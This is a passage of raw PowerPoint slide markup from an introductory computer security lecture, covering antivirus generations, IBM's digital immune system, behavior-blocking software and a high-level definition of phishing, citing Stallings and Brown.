              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" baseline="30000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> and 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" baseline="30000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> generation programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>memory-resident programs identify virus by actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>packages with a variety of antivirus techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>e.g.,  scanning &amp; activity traps, access-controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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0" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Digital Immune System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32770" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8229600" cy="5132387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Digital immune system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>A comprehensive approach to virus protection developed by IBM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>In response to the threat of internet-based virus propagation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Integrated mail systems (such as Lotus Notes &amp; Microsoft Outlook) make it simple to spread malicious programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Capabilities (such as Java) allows programs move from one system to another  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="7389813" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Digital Immune System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1268413"/>
            <a:ext cx="8362950" cy="5132387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Monitor on PC detects virus, using a variety of heuristics based on system behaviour, suspicious changes, etc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Admin. machine encrypts the sample, and sends it to a central virus analysis machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>In a controlled environment, the infected program can be safely run for analysis. The virus analysis machine then produces prescription for identifying and removal the virus </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>The prescription sent back to Admin(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Prescription forwarded to original PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Prescription also forwarded to other clients on this network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Other users also receive regular antivirus updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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4" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6958013" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Digital Immune System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="8686800" cy="4957763"/>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983042" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Behavior-Blocking Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integrated with host O/S;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Monitors program behavior in real-time:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>eg file access, disk format, executable mods, system settings changes, network access,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>for possibly malicious actions,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>if detected can block, terminate, or seek ok;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Has advantage over scanners;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But malicious code runs before detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>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a:xfrm>
            <a:off x="971550" y="260350"/>
            <a:ext cx="7489825" cy="865188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Phishing = Fishing ?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="1916113"/>
            <a:ext cx="7200900" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555" name="Picture 5" descr="Picture1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1038225"/>
            <a:ext cx="7715250" cy="5819775"/>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a:xfrm>
            <a:off x="1116013" y="260350"/>
            <a:ext cx="7172325" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1628775"/>
            <a:ext cx="8435975" cy="4805363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Computer Security Principles and Practice,                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Edition),  W. Stallings &amp; L. Brown,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    Chapter 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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a:xfrm>
            <a:off x="1116013" y="188913"/>
            <a:ext cx="6769100" cy="1008062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>What is Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1196975"/>
            <a:ext cx="5616575" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>A new type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>identity fraud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Targets are online businesses, e.g., financial organizations and their customers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Attempt to acquire sensitive information, e.g., account numbers and passwords </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Procedures: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Sending customers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Directing users to enter details at a fake website which appears almost identical to the legitimate site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 4" descr="phishing-trends.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300788" y="1125538"/>
            <a:ext cx="2592387" cy="2339975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24580" name="Picture 5" descr="1133632.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
